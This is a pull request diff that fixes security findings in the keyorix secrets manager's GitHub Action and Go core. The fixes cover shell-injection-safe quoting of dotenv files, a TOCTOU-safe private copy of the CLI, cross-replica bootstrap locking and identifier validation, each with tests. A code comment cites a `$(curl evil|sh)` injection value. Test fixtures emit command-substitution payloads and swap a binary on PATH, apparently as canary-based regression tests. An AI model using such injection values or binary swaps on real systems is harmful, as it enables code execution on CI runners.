### PR TITLE
fix(security): close Wave 6 medium-severity batch 4 (8 findings)

### DIFF
--- a/integrations/github-action/entrypoint.sh
+++ b/integrations/github-action/entrypoint.sh
@@ -102,29 +102,62 @@ install_cli() {
       exit 1
     fi
 
-    existing="$(command -v keyorix 2>/dev/null || true)"
-    if [[ -n "$existing" ]]; then
-      if actual="$(sha256_of "$existing" 2>/dev/null)" && [[ -n "$actual" ]] && [[ "$actual" = "$expected" ]]; then
-        echo "Using existing keyorix at ${existing} (checksum verified against ${VERSION})"
-        KEYORIX_BIN="$existing"
-        "$KEYORIX_BIN" --version
-        return
-      fi
-      echo "warning: keyorix already on PATH does not match ${VERSION}'s published checksum; ignoring it and installing a fresh, verified copy" >&2
-    fi
-
     # A fresh, non-predictable directory per run (mirroring install.sh's own
     # `mktemp -d`, not a fixed, guessable path as this used previously)
     # closes off a symlink/TOCTOU race where another process on a shared
     # runner pre-creates or swaps the path between our download, checksum
     # check, chmod, and mv below. Cleaned up on any exit path via the trap.
+    # Created BEFORE the existing-on-PATH check below (not just before the
+    # download further down) because that check needs a private copy target
+    # too — see the comment there.
     #
     # An explicit template under $TMPDIR (rather than a bare `mktemp -d`) so
     # this respects a caller-set $TMPDIR instead of some implementations'
     # fixed OS temp dir fallback.
     tmp_dir="$(mktemp -d "${TMPDIR:-/tmp}/keyorix-cli.XXXXXX")"
-    trap 'rm -rf "$tmp_dir"' EXIT
+    # The path is interpolated into the trap command NOW, at registration
+    # time (rather than left as a `$tmp_dir` reference to be evaluated when
+    # the trap fires) because `tmp_dir` is a `local` of this function: the
+    # existing-on-PATH branch below can `return` from install_cli well
+    # before the script actually exits, which unsets the local — a deferred
+    # `"$tmp_dir"` reference would then fail with "unbound variable" under
+    # `set -u` when the EXIT trap finally runs. Baking in the literal path
+    # avoids depending on the variable still being in scope at that point.
+    # Expanding $tmp_dir NOW (not when the trap fires) is the point of this
+    # line, see above — so SC2064 doesn't apply here.
+    # shellcheck disable=SC2064
+    trap "rm -rf '${tmp_dir}'" EXIT
     tmp_bin="${tmp_dir}/keyorix"
+
+    existing="$(command -v keyorix 2>/dev/null || true)"
+    if [[ -n "$existing" ]]; then
+      # Checksum-verifying $existing here and then trusting that same PATH
+      # entry for every LATER invocation of $KEYORIX_BIN (well after
+      # install_cli returns, e.g. the `secret export` call much further down
+      # this script) leaves a TOCTOU window: a compromised runner image, a
+      # poisoned PATH, or a self-hosted runner shared with other jobs could
+      # swap the file (or repoint a symlink) at that path between this check
+      # and the later use, defeating the verification entirely (adversarial-
+      # review integrations-github-action.json#3). Close the window by
+      # copying $existing into our own private, non-attacker-writable
+      # $tmp_dir FIRST, hashing and using ONLY that copy from here on —
+      # rather than hashing $existing and continuing to trust the shared
+      # path afterward. Copying before hashing (not hashing $existing and
+      # copying it afterward) matters too: the bytes that get verified must
+      # be exactly the bytes that get used, not two separate reads of a path
+      # someone else could still be racing.
+      if cp "$existing" "$tmp_bin" 2>/dev/null \
+        && chmod +x "$tmp_bin" \
+        && actual="$(sha256_of "$tmp_bin" 2>/dev/null)" \
+        && [[ -n "$actual" ]] \
+        && [[ "$actual" = "$expected" ]]; then
+        echo "Using existing keyorix at ${existing} (checksum verified against ${VERSION}, copied to a private location for the rest of this run)"
+        KEYORIX_BIN="$tmp_bin"
+        "$KEYORIX_BIN" --version
+        return
+      fi
+      echo "warning: keyorix already on PATH does not match ${VERSION}'s published checksum; ignoring it and installing a fresh, verified copy" >&2
+    fi
 
     echo "Downloading keyorix ${VERSION} (${os}/${arch})..."
     curl --proto '=https' --tlsv1.2 -fsSL "$url" -o "$tmp_bin" # NOSONAR -- bash:S6506 false positive: --proto '=https' --tlsv1.2 enforces HTTPS; redirect-following is required for GitHub release CDN
@@ -303,11 +336,30 @@ inject_env() {
 # while writing values from a SECOND, different fetch would let a changed
 # value land in the file without ever being registered via mask_value, so a
 # later step that cats/sources the file would print it in the clear in the
-# job log. Quoting mirrors internal/cli/secret/export.go's writeDotenv so
-# the file matches what `keyorix secret export --format dotenv` itself
-# would have produced from this same data.
+# job log.
+#
+# Quoting strategy: this action's own docs/CI_CD.md documents `set -a && .
+# ./keyorix.env && set +a` as the recommended way to consume this exact file
+# format for the sibling GitLab CI/CircleCI examples — sourcing it with a
+# shell is a real, documented consumption path, not a hypothetical misuse. A
+# value is left UNQUOTED only when it consists ENTIRELY of a small
+# allowlisted "plainly safe" charset (alnum plus `_.,:/@+-`); ANY other
+# value — one containing a character this function used to individually
+# denylist, or any other character it hadn't anticipated — is wrapped in
+# SINGLE quotes, with only the single-quote character itself escaped via the
+# standard close-escape-reopen idiom ('\''). Single quotes are the only
+# POSIX-shell quoting form that suppresses ALL expansion (command
+# substitution `$(...)`/backtick, parameter/arithmetic expansion, globbing,
+# tilde expansion) inside the value. A previous revision used DOUBLE quotes
+# here, which do NOT suppress `$(...)`/backtick command substitution — a
+# secret value containing e.g. `$(curl evil|sh)` survived into the file
+# unneutralized and would execute if the file was later sourced
+# (adversarial-review integrations-github-action.json#2). This intentionally
+# diverges from internal/cli/secret/export.go's writeDotenv, which still
+# double-quotes and has the same unfixed gap — see that finding for why this
+# file, specifically, treats sourcing as a realistic threat model.
 write_output_file() {
-  local json="$1" file="$2" key val escaped
+  local json="$1" file="$2" key val escaped sq="'"
 
   while IFS= read -r key; do
     [[ -n "$key" ]] || continue
@@ -327,12 +379,11 @@ write_output_file() {
       while IFS= read -r key; do
         [[ -n "$key" ]] || continue
         val="$(printf '%s' "$json" | jq -r --arg k "$key" '.[$k]')"
-        if [[ "$val" == *[[:space:]]* || "$val" == *"\""* || "$val" == *"'"* || "$val" == *"="* || "$val" == *"\\"* ]]; then
-          escaped="${val//\\/\\\\}"
-          escaped="${escaped//\"/\\\"}"
-          printf '%s="%s"\n' "$key" "$escaped"
-        else
+        if [[ "$val" =~ ^[A-Za-z0-9_.,:/@+-]*$ ]]; then
           printf '%s=%s\n' "$key" "$val"
+        else
+          escaped="${val//"$sq"/$sq\\$sq$sq}"
+          printf "%s='%s'\n" "$key" "$escaped"
         fi
       done < <(printf '%s' "$json" | jq -r 'keys[]')
     } >"$file"

--- a/integrations/github-action/test/entrypoint_test.sh
+++ b/integrations/github-action/test/entrypoint_test.sh
@@ -249,6 +249,99 @@ else
   bad "#179: heredoc delimiter entropy looks too low (delimiter: '${delim_line}', suffix length: ${#delim_suffix})"
 fi
 
+# --- adversarial-review (integrations-github-action.json#2): a secret
+# VALUE containing $(...) or `...` command substitution must NOT execute if
+# the generated output file is later `source`d by a shell — a real,
+# documented consumption pattern for this exact file (see docs/CI_CD.md's
+# GitLab/CircleCI examples: `set -a && . ./keyorix.env && set +a`).
+# write_output_file used to double-quote such values, which does not
+# suppress $(...)/backtick expansion, so `source`ing the file would have
+# executed the embedded command.
+cp "${fixtures}/mock_keyorix_injection.sh" "${mockbin}/keyorix"
+chmod +x "${mockbin}/keyorix"
+
+injection_canary="${workdir}/injection_canary"
+backtick_canary="${workdir}/backtick_canary"
+out_file_inj="${workdir}/injection.env"
+set +e
+PATH="${mockbin}:${PATH}" \
+  KEYORIX_SERVER="https://example.invalid" \
+  KEYORIX_TOKEN="dummy-token" \
+  INPUT_VERSION="v1.2.3" \
+  MOCK_KEYORIX_PATH="${mockbin}/keyorix" \
+  INJECTION_CANARY="$injection_canary" \
+  BACKTICK_CANARY="$backtick_canary" \
+  INPUT_EXPORT_TO_ENV="false" \
+  INPUT_OUTPUT_FILE="$out_file_inj" \
+  bash "$entrypoint" >"${workdir}/stdout4.log" 2>"${workdir}/stderr4.log"
+rc4=$?
+set -e
+
+if [[ "$rc4" -eq 0 ]] && [[ -f "$out_file_inj" ]]; then
+  ok "#2: entrypoint completed successfully and wrote the injection-payload output file"
+else
+  bad "#2: entrypoint did not complete successfully for the injection case (rc=${rc4}); stderr: $(cat "${workdir}/stderr4.log")"
+fi
+
+# The payloads must be SINGLE-quoted in the output file (the fix), not
+# double-quoted or left unquoted, so $(...)/backticks inside them can never
+# be evaluated by a later `source`.
+if grep -qF "INJECTION_SECRET='\$(touch ${injection_canary})'" "$out_file_inj" \
+  && grep -qF "BACKTICK_SECRET='\`touch ${backtick_canary}\`'" "$out_file_inj"; then
+  ok "#2: command-substitution and backtick payloads are single-quoted (not double-quoted/unquoted) in the output file"
+else
+  bad "#2: output file did not single-quote the injection payloads as expected: $(cat "$out_file_inj")"
+fi
+
+# The actual proof: sourcing the generated file (the documented consumption
+# pattern) must NOT execute either embedded command.
+# shellcheck disable=SC1090
+( set +u; set -a; . "$out_file_inj"; set +a ) || true
+if [[ -f "$injection_canary" || -f "$backtick_canary" ]]; then
+  bad "#2: sourcing the output file executed an embedded \$(...)/backtick command (a canary file was created)"
+else
+  ok "#2: sourcing the output file did NOT execute either embedded \$(...)/backtick command"
+fi
+
+# --- adversarial-review (integrations-github-action.json#3): install_cli's
+# on-PATH-reuse branch checksum-verifies an on-PATH `keyorix` ONCE and must
+# not go on to trust/re-execute that same shared PATH location for a LATER
+# invocation without re-verification. Simulates an attacker with write
+# access to the shared PATH location swapping the binary immediately after
+# the checksum check passes but before the later `secret export` call —
+# the fix must make that later call unaffected (an already-verified private
+# copy), not re-resolve/re-read the now-swapped shared path.
+cp "${fixtures}/mock_keyorix_toctou.sh" "${mockbin}/keyorix"
+chmod +x "${mockbin}/keyorix"
+
+toctou_canary="${workdir}/toctou_canary"
+toctou_github_env="${workdir}/toctou_github_env"
+
+set +e
+PATH="${mockbin}:${PATH}" \
+  KEYORIX_SERVER="https://example.invalid" \
+  KEYORIX_TOKEN="dummy-token" \
+  INPUT_VERSION="v1.2.3" \
+  MOCK_KEYORIX_PATH="${mockbin}/keyorix" \
+  TOCTOU_CANARY="$toctou_canary" \
+  INPUT_EXPORT_TO_ENV="true" \
+  GITHUB_ENV="$toctou_github_env" \
+  bash "$entrypoint" >"${workdir}/stdout5.log" 2>"${workdir}/stderr5.log"
+rc5=$?
+set -e
+
+if [[ "$rc5" -eq 0 ]] && [[ ! -f "$toctou_canary" ]]; then
+  ok "#3: TOCTOU — the later \$KEYORIX_BIN invocation was unaffected by swapping the on-PATH binary after the checksum check (a private copy was used)"
+else
+  bad "#3: TOCTOU — swapping the on-PATH binary after the checksum check affected a later \$KEYORIX_BIN invocation (rc=${rc5}, canary present: $([[ -f "$toctou_canary" ]] && echo yes || echo no)); stdout: $(cat "${workdir}/stdout5.log"); stderr: $(cat "${workdir}/stderr5.log")"
+fi
+
+if grep -q "copied to a private location" "${workdir}/stdout5.log"; then
+  ok "#3: install_cli logged that the verified on-PATH binary was copied to a private location before reuse"
+else
+  bad "#3: install_cli did not log the private-copy behavior the TOCTOU fix relies on; stdout: $(cat "${workdir}/stdout5.log")"
+fi
+
 echo
 echo "${pass} passed, ${fail} failed"
 [[ "$fail" -eq 0 ]]

--- a/integrations/github-action/test/fixtures/mock_keyorix_injection.sh
+++ b/integrations/github-action/test/fixtures/mock_keyorix_injection.sh
@@ -1,0 +1,40 @@
+#!/usr/bin/env bash
+# Mock keyorix CLI used by entrypoint_test.sh's adversarial-review
+# integrations-github-action.json#2 case: placed on PATH before
+# entrypoint.sh runs, paired with INPUT_VERSION and
+# mock_curl_checksum_match.sh (which serves this exact file's SHA-256 as the
+# published checksum) so install_cli's checksum-verified reuse path accepts
+# it without touching the network.
+#
+# Returns two secret VALUES crafted as command-substitution / backtick
+# payloads — `touch $INJECTION_CANARY` and `touch $BACKTICK_CANARY` — so the
+# test can prove write_output_file's escaping neutralizes BOTH forms of
+# command substitution: if the generated output file is later `source`d and
+# either canary file gets created, the payload executed and the fix failed.
+if [[ "$1" = "--version" ]]; then
+  echo "keyorix version mock-1.0.0"
+  exit 0
+fi
+if [[ "$1" = "secret" ]] && [[ "$2" = "export" ]]; then
+  fmt=""
+  args=("$@")
+  for ((i = 0; i < ${#args[@]}; i++)); do
+    case "${args[$i]}" in
+      --format) fmt="${args[$((i + 1))]}" ;;
+      *) ;;
+    esac
+  done
+  case "$fmt" in
+    json)
+      # The literal, unexpanded $(...) / `...` text is the point of this
+      # fixture — it must reach entrypoint.sh's jq parsing unevaluated.
+      # shellcheck disable=SC2016
+      printf '{"INJECTION_SECRET":"$(touch %s)","BACKTICK_SECRET":"`touch %s`"}' \
+        "$INJECTION_CANARY" "$BACKTICK_CANARY"
+      exit 0
+      ;;
+    *) ;;
+  esac
+fi
+echo "mock keyorix: unhandled args: $*" >&2
+exit 1

--- a/integrations/github-action/test/fixtures/mock_keyorix_toctou.sh
+++ b/integrations/github-action/test/fixtures/mock_keyorix_toctou.sh
@@ -1,0 +1,48 @@
+#!/usr/bin/env bash
+# Mock keyorix CLI simulating the TOCTOU race install_cli's on-PATH-reuse
+# branch must close (adversarial-review integrations-github-action.json#3).
+# Paired with mock_curl_checksum_match.sh via $MOCK_KEYORIX_PATH (the same
+# path this file is placed at on PATH), so install_cli's checksum-verified
+# reuse path accepts it without a real download.
+#
+# On the FIRST call install_cli makes after a successful checksum match
+# (`--version`), this simulates an attacker with write access to the shared
+# PATH location ($MOCK_KEYORIX_PATH) swapping the file there for a
+# malicious payload that touches $TOCTOU_CANARY and fails — modeling the
+# race window between the checksum check and any LATER invocation of
+# $KEYORIX_BIN (e.g. the `secret export` call, well after install_cli
+# returns). If entrypoint.sh's later use still resolves/re-reads
+# $MOCK_KEYORIX_PATH (the vulnerable behavior this fixture targets), it runs
+# the swapped malicious payload; if it instead uses an already-made private
+# copy unaffected by the swap (the fix), it doesn't.
+if [[ "$1" = "--version" ]]; then
+  # Intentionally unquoted heredoc delimiter: $TOCTOU_CANARY must be
+  # expanded NOW, into the swapped-in file's content, not left literal.
+  cat >"$MOCK_KEYORIX_PATH" <<MALICIOUS
+#!/usr/bin/env bash
+touch "${TOCTOU_CANARY}"
+exit 1
+MALICIOUS
+  chmod +x "$MOCK_KEYORIX_PATH"
+  echo "keyorix version mock-1.0.0"
+  exit 0
+fi
+if [[ "$1" = "secret" ]] && [[ "$2" = "export" ]]; then
+  fmt=""
+  args=("$@")
+  for ((i = 0; i < ${#args[@]}; i++)); do
+    case "${args[$i]}" in
+      --format) fmt="${args[$((i + 1))]}" ;;
+      *) ;;
+    esac
+  done
+  case "$fmt" in
+    json)
+      printf '{"TOCTOU_OK":"original-binary-still-in-use"}'
+      exit 0
+      ;;
+    *) ;;
+  esac
+fi
+echo "mock keyorix: unhandled args: $*" >&2
+exit 1

--- a/internal/core/auth_bootstrap.go
+++ b/internal/core/auth_bootstrap.go
@@ -193,18 +193,31 @@ const systemInitializedKey = "system_initialized" // #nosec G101 -- metadata key
 //   - three default environments (development, staging, production)
 //
 // Idempotent: if the install is already initialised, returns the current state
-// with AlreadyInitialized=true and performs no writes. bootstrapMu serializes the
-// whole check-then-create sequence so two concurrent first calls can't both pass
-// the check and double-seed (the storage layer alone doesn't make this atomic).
+// with AlreadyInitialized=true and performs no writes. The whole check-then-create
+// sequence runs under storage.WithBootstrapLock (#339, #core-auth-03): without it,
+// two concurrent callers who both already hold the valid bootstrap token (different
+// usernames) could each observe total==0 before either CreateUser lands, producing
+// two "first admins" — and, in an HA deployment (ADR-039), those two callers can
+// land on different replicas, where a plain in-process mutex provides no
+// coordination at all. The token check above already closes the unauthenticated
+// race; the lock closes the authenticated one, across every replica.
 func (c *KeyorixCore) BootstrapSystem(ctx context.Context, req *BootstrapRequest) (*BootstrapResult, error) { // NOSONAR -- cognitive complexity 28, suppress go:S3776
-	// Serialize the whole "is this a fresh install" check through admin creation
-	// (#339): without this, two concurrent callers who both already hold the valid
-	// bootstrap token (different usernames) could each observe total==0 before
-	// either CreateUser lands, producing two "first admins". The token check above
-	// already closes the unauthenticated race; this closes the authenticated one.
-	c.bootstrapMu.Lock()
-	defer c.bootstrapMu.Unlock()
+	var result *BootstrapResult
+	err := c.storage.WithBootstrapLock(ctx, func() error {
+		res, berr := c.bootstrapSystemLocked(ctx, req)
+		result = res
+		return berr
+	})
+	if err != nil {
+		return nil, err
+	}
+	return result, nil
+}
 
+// bootstrapSystemLocked performs the actual check-then-create sequence. The
+// caller MUST hold storage.WithBootstrapLock for the duration of this call (see
+// BootstrapSystem).
+func (c *KeyorixCore) bootstrapSystemLocked(ctx context.Context, req *BootstrapRequest) (*BootstrapResult, error) {
 	// The permanent marker is authoritative once set — see systemInitializedKey.
 	if _, found, err := c.storage.GetSystemMetadata(ctx, systemInitializedKey); err != nil {
 		return nil, fmt.Errorf("failed to check system initialisation state: %w", err)

--- a/internal/core/catalog.go
+++ b/internal/core/catalog.go
@@ -5,6 +5,7 @@ import (
 	"errors"
 	"fmt"
 	"regexp"
+	"strings"
 
 	"github.com/keyorixhq/keyorix/internal/core/storage"
 	"github.com/keyorixhq/keyorix/internal/i18n"
@@ -46,6 +47,13 @@ var identifierRegex = regexp.MustCompile(`^[a-zA-Z0-9 _-]+$`)
 func validateIdentifier(name string) error {
 	if !identifierRegex.MatchString(name) {
 		return fmt.Errorf("%s: must contain only letters, digits, spaces, - or _", i18n.T("ErrorValidation", nil))
+	}
+	// Mirrors server/validation/validator.go's validateIdentifier: reject
+	// whitespace variants that pass the charset check above but defeat the
+	// anti-spoofing intent — all-whitespace, leading/trailing whitespace, or
+	// repeated internal whitespace (e.g. "Support Team" vs "Support  Team").
+	if trimmed := strings.TrimSpace(name); trimmed == "" || trimmed != name || strings.Contains(trimmed, "  ") {
+		return fmt.Errorf("%s: must not be all whitespace or have leading, trailing, or repeated internal whitespace", i18n.T("ErrorValidation", nil))
 	}
 	return nil
 }

--- a/internal/core/catalog.go
+++ b/internal/core/catalog.go
@@ -63,7 +63,11 @@ func validateProjectName(name string) error {
 	return validateIdentifier(name)
 }
 
-// validateEnvironmentName bounds Environment.Name (#383), mirroring validateProjectName.
+// validateEnvironmentName bounds Environment.Name (#383), mirroring
+// validateProjectName. Also enforces the anti-homograph identifier charset
+// (G38) — see validateIdentifier. Environment names were previously missed by
+// G38's project-name fix, so a confusable/spoofed environment name could
+// still slip past every transport (gRPC, CLI embedded mode), not just HTTP.
 func validateEnvironmentName(name string) error {
 	if name == "" {
 		return fmt.Errorf("%s: environment name is required", i18n.T("ErrorValidation", nil))
@@ -71,7 +75,7 @@ func validateEnvironmentName(name string) error {
 	if len(name) > maxEnvironmentNameLen {
 		return fmt.Errorf("%s: environment name exceeds %d characters", i18n.T("ErrorValidation", nil), maxEnvironmentNameLen)
 	}
-	return nil
+	return validateIdentifier(name)
 }
 
 // translateProjectNameError surfaces storage.ErrDuplicateProjectName (#385, the

--- a/internal/core/catalog_wave6_identifier_whitespace_test.go
+++ b/internal/core/catalog_wave6_identifier_whitespace_test.go
@@ -1,0 +1,64 @@
+// catalog_wave6_identifier_whitespace_test.go — Wave 6 batch 4: regression
+// coverage for catalog.go's validateIdentifier/identifierRegex whitespace-
+// spoofing gap (findings-server/validation.json#2), mirroring the fix and
+// tests in server/validation/validator.go. The [a-zA-Z0-9 _-] charset alone
+// let a project name be all whitespace, or have leading/trailing/repeated
+// internal whitespace, defeating the anti-homograph/anti-spoofing intent
+// documented on identifierRegex (G38): e.g. "   ", "  my project  ", and
+// "my  project" all satisfied the raw charset check yet are visually blank
+// or confusable with a legitimate name.
+package core
+
+import "testing"
+
+func TestValidateIdentifier_Wave6_AllWhitespaceRejected(t *testing.T) {
+	if err := validateIdentifier("   "); err == nil {
+		t.Error("all-whitespace name must be rejected")
+	}
+}
+
+func TestValidateIdentifier_Wave6_LeadingTrailingWhitespaceRejected(t *testing.T) {
+	if err := validateIdentifier(" myproject "); err == nil {
+		t.Error("leading/trailing whitespace must be rejected")
+	}
+	if err := validateIdentifier("myproject "); err == nil {
+		t.Error("trailing whitespace alone must be rejected")
+	}
+	if err := validateIdentifier(" myproject"); err == nil {
+		t.Error("leading whitespace alone must be rejected")
+	}
+}
+
+func TestValidateIdentifier_Wave6_RepeatedInternalWhitespaceRejected(t *testing.T) {
+	if err := validateIdentifier("my  project"); err == nil {
+		t.Error("double internal space must be rejected")
+	}
+	if err := validateIdentifier("Support  Team"); err == nil {
+		t.Error("double internal space must be rejected")
+	}
+}
+
+func TestValidateIdentifier_Wave6_LegitimateNamesStillPass(t *testing.T) {
+	if err := validateIdentifier("myproject"); err != nil {
+		t.Errorf("expected no error for plain name, got %v", err)
+	}
+	if err := validateIdentifier("My Project"); err != nil {
+		t.Errorf("expected a single internal space to be accepted, got %v", err)
+	}
+	if err := validateIdentifier("prod-db_01"); err != nil {
+		t.Errorf("expected no error for hyphen/underscore name, got %v", err)
+	}
+}
+
+// TestValidateProjectName_Wave6_WhitespaceOnlyRejected exercises the same gap
+// through the public validateProjectName entry point (used by CreateProject /
+// CreateProjectWithEnvs), confirming the fix closes the gap end-to-end and
+// not just at the internal helper.
+func TestValidateProjectName_Wave6_WhitespaceOnlyRejected(t *testing.T) {
+	if err := validateProjectName("   "); err == nil {
+		t.Error("all-whitespace project name must be rejected")
+	}
+	if err := validateProjectName("My Project"); err != nil {
+		t.Errorf("expected a legitimate project name to be accepted, got %v", err)
+	}
+}

--- a/internal/core/concurrency_bootstrap_cross_replica_test.go
+++ b/internal/core/concurrency_bootstrap_cross_replica_test.go
@@ -1,0 +1,145 @@
+// concurrency_bootstrap_cross_replica_test.go — regression coverage for
+// #core-auth-03: BootstrapSystem's check-then-create sequence must serialize
+// across HA replicas (ADR-039), not just within one process. A plain
+// KeyorixCore-level sync.Mutex only ever guards goroutines inside the SAME
+// KeyorixCore instance; two different replica processes — each with their own
+// KeyorixCore, both talking to the same shared database — have no coordination
+// through it at all, so both could observe "not yet initialised" and each
+// independently seed a "first admin".
+//
+// This test simulates that topology at the Go level: multiple independent
+// KeyorixCore instances (standing in for separate replica processes) all backed
+// by ONE shared storage.Storage. Pre-fix, each instance's own bootstrapMu cannot
+// see the others, so the race reproduces even though they share a database.
+// Post-fix, BootstrapSystem serializes through storage.WithBootstrapLock, which
+// lives on the shared storage instance (not on any one replica's KeyorixCore) —
+// exactly mirroring how a real PostgreSQL advisory lock is scoped to the shared
+// database, not to any one replica's process.
+package core
+
+import (
+	"context"
+	"fmt"
+	"sync"
+	"testing"
+
+	"github.com/keyorixhq/keyorix/internal/config"
+	"github.com/keyorixhq/keyorix/internal/core/storage"
+	"github.com/keyorixhq/keyorix/internal/i18n"
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/keyorixhq/keyorix/internal/storage/sqlitedialect"
+	"github.com/keyorixhq/keyorix/internal/storage/store"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	"gorm.io/gorm"
+)
+
+// sharedBootstrapStorage returns a single storage.Storage instance backed by a
+// fresh in-memory DB, standing in for the ONE database every replica in an HA
+// deployment shares.
+func sharedBootstrapStorage(t *testing.T) storage.Storage {
+	t.Helper()
+	require.NoError(t, i18n.Initialize(&config.Config{
+		Locale: config.LocaleConfig{Language: "en", FallbackLanguage: "en"},
+	}))
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(
+		&models.User{}, &models.Role{}, &models.Permission{}, &models.RolePermission{},
+		&models.UserRole{}, &models.Group{}, &models.UserGroup{}, &models.GroupRole{},
+		&models.Project{}, &models.Environment{}, &models.SystemMetadata{},
+	))
+	return store.NewLocalStorage(db)
+}
+
+// replicaBootstrapCore returns a KeyorixCore standing in for one replica's
+// process: its own instance (own Go-level state, own bootstrapToken copy — same
+// as every replica gets the same KEYORIX_BOOTSTRAP_TOKEN from shared config) but
+// wired to the shared storage every replica in the deployment talks to.
+func replicaBootstrapCore(shared storage.Storage, token string) *KeyorixCore {
+	c := NewKeyorixCore(shared)
+	c.SetBootstrapToken(token)
+	return c
+}
+
+// TestConcurrency_BootstrapSystem_CrossReplicaExactlyOneAdmin drives many
+// concurrent BootstrapSystem calls spread across SEVERAL independent KeyorixCore
+// instances (simulating several HA replicas), all racing against ONE shared
+// database with the same valid bootstrap token but different usernames — the
+// exact #core-auth-03 exploit scenario. Only one call across the whole fleet may
+// actually seed the first admin; every other call must observe
+// AlreadyInitialized, and the store must end up in a fully consistent state: one
+// user, and none of the seeded RBAC data duplicated.
+func TestConcurrency_BootstrapSystem_CrossReplicaExactlyOneAdmin(t *testing.T) {
+	shared := sharedBootstrapStorage(t)
+	const token = "correct-token"
+
+	const replicas = 5
+	const callsPerReplica = 4
+	cores := make([]*KeyorixCore, replicas)
+	for i := range cores {
+		cores[i] = replicaBootstrapCore(shared, token)
+	}
+
+	var wg sync.WaitGroup
+	start := make(chan struct{})
+	type outcome struct {
+		created bool
+		err     error
+	}
+	results := make(chan outcome, replicas*callsPerReplica)
+	n := 0
+	for r := 0; r < replicas; r++ {
+		for i := 0; i < callsPerReplica; i++ {
+			n++
+			wg.Add(1)
+			go func(c *KeyorixCore, idx int) {
+				defer wg.Done()
+				<-start
+				req := &BootstrapRequest{
+					Username:    fmt.Sprintf("admin-%d", idx),
+					Email:       fmt.Sprintf("admin-%d@example.com", idx),
+					Password:    "BootstrapPass123!",
+					DisplayName: "Admin",
+					Token:       token,
+				}
+				res, err := c.BootstrapSystem(context.Background(), req)
+				if err != nil {
+					results <- outcome{err: err}
+					return
+				}
+				results <- outcome{created: !res.AlreadyInitialized}
+			}(cores[r], n)
+		}
+	}
+	close(start)
+	wg.Wait()
+	close(results)
+
+	created := 0
+	for res := range results {
+		assert.NoError(t, res.err, "no concurrent bootstrap call holding the valid token should error")
+		if res.created {
+			created++
+		}
+	}
+	assert.Equal(t, 1, created, "exactly one call across every replica may create the first admin")
+
+	// The store must end up fully consistent: exactly one user, and the RBAC seed
+	// (permissions/roles) ran exactly once — not once per racing replica.
+	_, total, err := shared.ListUsers(context.Background(), &storage.UserFilter{Page: 1, PageSize: 100})
+	require.NoError(t, err)
+	assert.Equal(t, int64(1), total, "exactly one admin user must exist, not one per racing replica")
+
+	roles, err := shared.ListRoles(context.Background())
+	require.NoError(t, err)
+	assert.Len(t, roles, len(defaultRoles), "roles must be seeded exactly once across every replica")
+
+	perms, err := shared.ListPermissions(context.Background())
+	require.NoError(t, err)
+	assert.Len(t, perms, len(defaultPermissions), "permissions must be seeded exactly once across every replica")
+
+	projects, err := shared.ListProjects(context.Background())
+	require.NoError(t, err)
+	assert.Len(t, projects, 1, "the default project must be created exactly once across every replica")
+}

--- a/internal/core/g38_transport_agnostic_validation_test.go
+++ b/internal/core/g38_transport_agnostic_validation_test.go
@@ -84,6 +84,40 @@ func TestCreateProjectWithEnvs_RejectsHomographCharset(t *testing.T) {
 	assert.Contains(t, err.Error(), "letters, digits, spaces, - or _")
 }
 
+// TestCreateEnvironment_RejectsHomographCharset: sibling of
+// TestCreateProject_RejectsHomographCharset — environment names must be
+// refused the same anti-homograph/anti-spoofing charset guard project names
+// get. Before this fix, validateEnvironmentName only checked for empty/
+// over-length names, so a confusable/spoofed environment name (e.g. a
+// Cyrillic "а" standing in for Latin "a") could slip past every transport,
+// not just HTTP.
+func TestCreateEnvironment_RejectsHomographCharset(t *testing.T) {
+	c, _ := newG38TestCore(t)
+	ctx := context.Background()
+
+	p, err := c.CreateProject(ctx, "legit-project", "")
+	require.NoError(t, err)
+
+	for _, name := range []string{
+		"аdmin",    // Cyrillic "а" (U+0430) homograph of Latin "a"
+		"env™",     // trademark symbol
+		"a/b",      // path separator
+		"a\u200bb", // zero-width space
+	} {
+		_, err := c.CreateEnvironment(ctx, p.ID, name)
+		require.Errorf(t, err, "name %q should have been rejected", name)
+		assert.Contains(t, err.Error(), "letters, digits, spaces, - or _")
+	}
+
+	// Legitimate names (letters, digits, spaces, hyphen, underscore) are accepted.
+	// (CreateProject auto-seeds "development"/"staging"/"production", so use
+	// names that don't collide with those defaults.)
+	for _, name := range []string{"qa", "staging-2"} {
+		_, err := c.CreateEnvironment(ctx, p.ID, name)
+		require.NoError(t, err)
+	}
+}
+
 // TestCreateEnvironment_RefusesDeadParentProject pins member 3 ("parent
 // project must be live"): CreateEnvironment must refuse to create an
 // environment under a soft-deleted project. Before this fix, only the HTTP

--- a/internal/core/mock_storage_test.go
+++ b/internal/core/mock_storage_test.go
@@ -43,6 +43,11 @@ func (m *MockStorage) WithAuditCheckpointLock(_ context.Context, fn func() error
 	return fn()
 }
 
+// WithBootstrapLock runs fn directly in tests (single instance, no DB lock).
+func (m *MockStorage) WithBootstrapLock(_ context.Context, fn func() error) error {
+	return fn()
+}
+
 // WithTransaction runs fn directly against the mock (no real transaction in tests).
 func (m *MockStorage) WithTransaction(_ context.Context, fn func(storage.Storage) error) error {
 	return fn(m)

--- a/internal/core/service.go
+++ b/internal/core/service.go
@@ -90,13 +90,12 @@ type KeyorixCore struct {
 	// (from KEYORIX_BOOTSTRAP_TOKEN, or a random value logged for the operator while the
 	// system is uninitialised); init refuses unless the caller presents a matching token.
 	bootstrapToken string
-	// bootstrapMu serializes BootstrapSystem's whole check-then-create sequence
-	// (permanent marker lookup, live user count, then seeding) through the admin
-	// CreateUser call, so two concurrent first calls — e.g. different usernames,
-	// both already holding the valid bootstrap token (#339) — cannot both observe
-	// "not yet initialised" and each create a "first admin". Zero value is ready to
-	// use. See auth_bootstrap.go.
-	bootstrapMu       sync.Mutex
+	// BootstrapSystem's check-then-create sequence is serialized via
+	// storage.WithBootstrapLock (a process mutex, plus a PostgreSQL advisory lock
+	// across HA replicas — see auth_bootstrap.go and #core-auth-03), not a
+	// KeyorixCore-level mutex: a per-process mutex here would only serialize
+	// callers within ONE replica, same gap #339 originally closed for concurrent
+	// same-process callers only.
 	secretValuePolicy SecretValuePolicy  // optional quality gate on secret values (off by default)
 	secretNamePolicy  SecretNamePolicy   // optional naming convention for secrets (off by default)
 	secretNameRe      *regexp.Regexp     // compiled secretNamePolicy.Pattern (nil = no regex check)

